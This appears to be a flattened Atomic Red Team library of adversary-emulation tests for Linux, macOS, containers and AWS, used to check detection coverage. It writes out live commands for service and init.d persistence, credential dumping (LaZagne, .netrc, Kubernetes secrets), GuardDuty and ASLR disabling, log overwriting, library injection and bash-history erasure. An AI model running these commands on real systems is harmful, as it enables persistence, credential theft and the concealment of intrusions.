This test creates a Systemd service unit file and enables it as a service.
echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file}
echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file}
echo "Type=simple" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file}
echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
systemctl enable #{systemd_service_file}
systemctl start #{systemd_service_file}
T1543.002
bash
elevated
linux
Create Systemd Service File, Enable the Service, Modify and Reload the Service
Systemd Service
This test creates a systemd service unit file and enables it to autostart on boot. Once the service is created and enabled, the test also modifies the same service file, showcasing both creation and modification of a system process.
echo "#!/bin/bash" > /etc/init.d/T1543.002
echo "### BEGIN INIT INFO" >> /etc/init.d/T1543.002
echo "# Provides : Atomic Test T1543.002" >> /etc/init.d/T1543.002
echo "# Required-Start: \$all" >> /etc/init.d/T1543.002
echo "# Required-Stop : " >> /etc/init.d/T1543.002
echo "# Default-Start: 2 3 4 5" >> /etc/init.d/T1543.002
echo "# Default-Stop: " >> /etc/init.d/T1543.002
echo "# Short Description: Atomic Test for Systemd Service Creation" >> /etc/init.d/T1543.002
echo "### END INIT INFO" >> /etc/init.d/T1543.002
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK')) \" " >> /etc/init.d/T1543.002
chmod +x /etc/init.d/T1543.002
if grep -qi 'ID=ubuntu' /etc/os-release || grep -qi 'ID=kali' /etc/os-release; then update-rc.d T1543.002 defaults; elif grep -qi 'ID="centos"' /etc/os-release; then chkconfig T1543.002 on; else echo "Please run this test on Ubuntu, Kali or CentOS"; fi
systemctl enable T1543.002
systemctl start T1543.002
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
systemctl daemon-reload
systemctl restart T1543.002
Launch Daemon
Utilize LaunchDaemon to launch Hello World
sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
T1546.004
bash
elevated
linux
Create/Append to .bash_logout
Unix Shell Configuration Modification
The Bash shell runs ~/.bash_logout "if it exists" to run commands on user logout. An adversary may create or append to a .bash_logout to clear history, start processes etc. Note the ~/.bash_logout is only run if you explicitly exit or log out of an "interactive login shell session" i.e. via the console, SSH, /bin/bash -l or su -l <username>. This test creates the art user, logs in, creates a .bash_logout which will echo some text into the art.txt file on logout and logs out and the /home/art/art.txt is created.
useradd --create-home --shell /bin/bash art
su -l art -c "echo 'echo \"Atomic Red Team was here... T1546.004\" >> /home/art/art.txt' >> /home/art/.bash_logout; exit"
T1547.006
bash
elevated
linux
Linux - Load Kernel Module via insmod
Kernel Modules and Extensions
This test uses the insmod command to load a kernel module for Linux.
sudo insmod #{module_path}
T1547.006
bash
elevated
macos
MacOS - Load Kernel Module via kextload and kmutil
Kernel Modules and Extensions
This test uses the kextload and kmutil commands to load and unload a MacOS kernel module.
set -x
sudo kextload #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload #{module_path}
sudo kmutil load -p #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kmutil unload -p #{module_path}
T1547.006
bash
elevated
macos
MacOS - Load Kernel Module via KextManagerLoadKextWithURL()
Kernel Modules and Extensions
This test uses the IOKit API to load a kernel module for macOS. Hardcoded to use the SoftRAID kext.
sudo #{exe_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload /Library/Extensions/SoftRAID.kext
T1547.015
bash
macos
Add macOS LoginItem using Applescript
Login Items
Runs osascript on a file to create a new LoginItem for the current user. NOTE: A dialog will pop up prompting the user to Allow or Deny Terminal.app to control "System Events"; therefore, it can't be automated until the TCC permission is granted. The login item launches Safari.app when the user logs in, but there is a cleanup script to remove it as well. In addition to the osascript process events, file modification events to /Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm should be seen.
osascript #{scriptfile}
T1552.001
bash
elevated
macos
Extract Browser and System credentials with LaZagne
Credentials In Files
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
python2 laZagne.py all
T1552.001
bash
linux, macos
Find and Access Github Credentials
Credentials In Files
This test looks for .netrc files (which store GitHub credentials in clear text) and dumps their contents if found.
find #{file_path} -type f -name .netrc 2> /dev/null | while read -r file; do echo "$file"; cat "$file"; done
Container API
A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services or provide further access to the cluster. [More information about secrets](https://kubernetes.io/docs/concepts/configuration/secret/). This test will make a request to the Kubernetes api at the /api/v1/secrets endpoint requesting every secret stored within the cluster.
kubectl get secrets --all-namespaces
Container API
A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services.
kubectl get secrets -n #{namespace}
T1560.001
bash
elevated
linux, macos
Data Compressed - nix - zip
Archive via Utility
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
zip #{output_file} #{input_files}
T1560.001
bash
linux, macos
Encrypts collected data with AES-256 and Base64
Archive via Utility
An adversary may compress all the collected data, encrypt and send them to a C2 server using base64 encoding. This atomic test tries to emulate the behaviour of the FLEXIROOT backdoor to archive the collected data. FLEXIROOT typically utilizes AES encryption and base64 encoding to transfer the encrypted data to the C2 server. In this test, standard zip compression and the OpenSSL library are used to encrypt the compressed data. https://attack.mitre.org/versions/v7/software/S0267/
zip -r #{input_folder}/#{input_file}.zip #{input_folder}
openssl enc -aes-256-cbc -pass pass:#{enc_pass} -p -in #{input_folder}/#{input_file}.zip -out #{input_folder}/#{input_file}.enc
cat #{input_folder}/#{input_file}.enc | base64
Domain Generation Algorithms
Simulates Domain Generation Algorithm (DGA) traffic by generating pseudo-random domains based on the current date and querying them using dig. This is designed to trigger DNS analytics and NGIDS.
python3 "#{python_script_path}"
Launchctl
Utilize launchctl
launchctl submit -l #{label_name} -- #{executable_path}
Service Execution
Will execute a command on the remote host with Impacket psexec.py script.
psexec.py '#{domain}/#{username}:#{password}@#{remote_host}' '#{command}'
T1572
bash
linux, macos
Microsoft Dev tunnels (Linux/macOS)
Protocol Tunneling
Dev Tunnels enable insiders as well as threat actors to expose local ports over the internet via Microsoft dev tunnels. This atomic will generate a dev tunnel, binding it to the local service running on the provided port. It can be used to expose local services, web applications, local files, etc. References: [Microsoft Docs](https://learn.microsoft.com/en-us/tunnels/dev-tunnels-overview) and [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/devtunnels/)
#{binary_path} host -p #{port} &
T1574.006
bash
elevated
linux
Shared Library Injection via /etc/ld.so.preload
Dynamic Linker Hijacking
This test adds a shared library to the ld.so.preload list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the glibc package. Upon successful execution, bash will echo ../bin/T1574.006.so to /etc/ld.so.preload.
sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'
T1574.006
bash
linux
Shared Library Injection via LD_PRELOAD
Dynamic Linker Hijacking
This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the glibc package. Upon successful execution, bash will utilize LD_PRELOAD to load the specified shared object library. Output will be via stdout.
LD_PRELOAD=#{path_to_shared_library} ls
T1574.006
bash
macos
Dylib Injection via DYLD_INSERT_LIBRARIES
Dynamic Linker Hijacking
Injects a dylib that opens Calculator via the DYLD_INSERT_LIBRARIES environment variable.
DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject}
T1609
bash
containers
ExecIntoContainer
Container Administration Command
Attackers who have permissions can run malicious commands in containers in the cluster using the exec command ("kubectl exec"). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu), as a backdoor container and run their malicious code remotely by using "kubectl exec".
kubectl create -f #{path} -n #{namespace}
# wait 3 seconds for the instance to come up
sleep 3
kubectl exec -n #{namespace} busybox -- #{command}
T1609
bash
containers
Docker Exec Into Container
Container Administration Command
Attackers who have permissions can run malicious commands in containers in the cluster using the exec command ("docker exec"). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu), as a backdoor container and run their malicious code remotely by using "docker exec". Kinsing (Golang-based malware) was executed with an Ubuntu container entry point that runs shell scripts.
docker build -t t1609 $PathtoAtomicsFolder/T1609/src/
docker run --name t1609_container --rm -itd t1609 bash /tmp/script.sh
docker exec -i t1609_container bash -c "cat /tmp/output.txt"
T1610
bash
containers
Deploy Docker container
Deploy Container
Adversaries may deploy containers based on retrieved or built malicious images, or from benign images that download and execute malicious payloads at runtime. They can do this using the docker create and docker start commands. Kinsing and Doki were deployed using this technique.
docker build -t t1610 $PathtoAtomicsFolder/T1610/src/
docker run --name t1610_container --rm -itd t1610 bash /tmp/script.sh
T1614
bash
macos, linux
Get geolocation info through IP-Lookup services using curl on FreeBSD, Linux or macOS
System Location Discovery
Get geolocation info through IP-Lookup services using curl on FreeBSD, Linux or macOS. The default URL of the IP-Lookup service is https://ipinfo.io/. References: https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
curl -k #{ip_lookup_url}
T1652
bash
linux
Device Driver Discovery (Linux)
Device Driver Discovery
Displays a list of loaded kernel modules on a Linux system, which is used to enumerate drivers.
lsmod
T1652
bash
linux
Enumerate Kernel Driver Files (Linux)
Device Driver Discovery
Finds and lists all kernel driver files on a Linux system in order to provide a broader view of available drivers, not just loaded ones.
find /lib/modules/$(uname -r)/kernel/drivers -name "*.ko*"
T1652
bash
macos
List loaded kernel extensions (macOS)
Device Driver Discovery
Displays a list of loaded kernel extensions (kexts) on a macOS system.
kextstat
T1652
bash
macos
Find Kernel Extensions (macOS)
Device Driver Discovery
Searches for kernel extension (kext) files on a macOS system.
kextfind
T1659
bash
macos, linux
MITM Proxy Injection
Content Injection
Start mitmdump and verify injected header and HTML content.
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
T1685
bash
iaas:aws
AWS - GuardDuty Suspension or Deletion
Disable or Modify Tools
Enables GuardDuty in AWS; upon successful creation, this test will suspend and then delete the GuardDuty detector configuration.
detectorId=$(aws guardduty create-detector --enable --region "#{region}" | grep -oP '(?<="DetectorId": ")[^"]*')
aws guardduty update-detector --no-enable --detector-id $detectorId
aws guardduty delete-detector --detector-id $detectorId
T1685
bash
elevated
linux
Disable ASLR Via sysctl parameters - Linux
Disable or Modify Tools
Executes the sysctl command to set kernel.randomize_va_space=0, which disables Address Space Layout Randomization (ASLR) in Linux.
sysctl -w kernel.randomize_va_space=0
T1685
bash
elevated
linux
Auditing Configuration Changes on Linux Host
Disable or Modify Tools
Emulates modification of auditd configuration files
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
T1685
bash
elevated
linux
Logging Configuration Changes on Linux Host
Disable or Modify Tools
Emulates modification of syslog configuration.
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
T1685.006
bash
elevated
linux
Overwrite Linux Mail Spool
Clear Linux or Mac System Logs
This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
echo 0 > /var/spool/mail/#{username}
T1685.006
bash
elevated
linux
Overwrite Linux Log
Clear Linux or Mac System Logs
This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
echo 0 > #{log_path}
T1690
bash
linux
Clear bash history
Prevent Command History Logging
An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities. In this test we use the $HISTFILE variable throughout to: 1. confirm the $HISTFILE variable is set; 2. echo "" into it; 3-5. confirm the file is empty; 6. clear the history cache; 7. confirm the history cache is empty. This is when the attacker would log off.
cp $HISTFILE $HISTFILE.OLD
if ((${#HISTFILE[@]})); then echo $HISTFILE; fi
echo "" > $HISTFILE
if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1 byte"; fi
ls -la $HISTFILE
cat $HISTFILE
history -c
if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
T1690
bash
linux
Setting the HISTCONTROL environment variable
Prevent Command History Logging
An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used. In this test we: 1. set $HISTCONTROL to ignoreboth; 2. clear the history cache; 3. execute ls -la with a space in front of it; 4. confirm that ls -la is not in the history cache; 5. set $HISTCONTROL to erasedups; 6. clear the history cache; 7-9. execute ls -la $HISTFILE 3 times; 10. confirm that there is only one command in history.
TEST=$(echo $HISTCONTROL)
if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi
history -c
ls -la $HISTFILE # " ls -la $HISTFILE"
if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi
if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi
history -c
ls -la $HISTFILE
ls -la $HISTFILE
ls -la $HISTFILE
if [ $(history |wc -l) -eq 2 ]; then echo "There is only one entry for ls -la $HISTFILE"; fi
T1690
bash
linux
Setting the HISTFILESIZE environment variable
Prevent Command History Logging
An adversary may set the bash history file size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we: 1. echo HISTFILESIZE; 2. set it to zero; 3. confirm that HISTFILESIZE is set to zero.
TEST=$(echo $HISTFILESIZE)
echo $HISTFILESIZE
export HISTFILESIZE=0
echo "running some commands to populate the history"
whoami
groups
if [ "$HISTFILESIZE" -eq 0 ]; then echo "\$HISTFILESIZE is zero"; else HIST_LENGTH=$(wc -l $HISTFILE); echo "\$HISTFILESIZE is not zero, history length is $HIST_LENGTH"; fi
T1690
bash
linux
Setting the HISTFILE environment variable
Prevent Command History Logging
An adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we: 1. echo HISTFILE; 2. set it to /dev/null; 3. confirm that HISTFILE is set to /dev/null.
TEST=$(echo $HISTFILE)
echo $HISTFILE
export HISTFILE="/dev/null"
echo "running some commands to populate the history"
whoami
groups
if [ "$HISTFILE" = "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; else HIST_LENGTH=$(wc -l $HISTFILE); echo "\$HISTFILE is not /dev/null, history length is $HIST_LENGTH"; fi
T1690
bash
linux
Setting the HISTIGNORE environment variable
Prevent Command History Logging
An adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands. In this test we: 1. set HISTIGNORE to ignore ls, rm and ssh commands; 2. clear the history cache; 3-4. execute ls commands; 5. confirm that the ls commands are not in the history cache; 6. unset the HISTIGNORE variable; 7 onwards: the same again, but ignoring ALL commands.
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
history -c
ls -la $HISTFILE
ls -la ~/.bash_logout
if [ $(history |wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi
unset HISTIGNORE
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
history -c
whoami
groups
if [ $(history |wc -l) -eq 0 ]; then echo "History cache is empty"; fi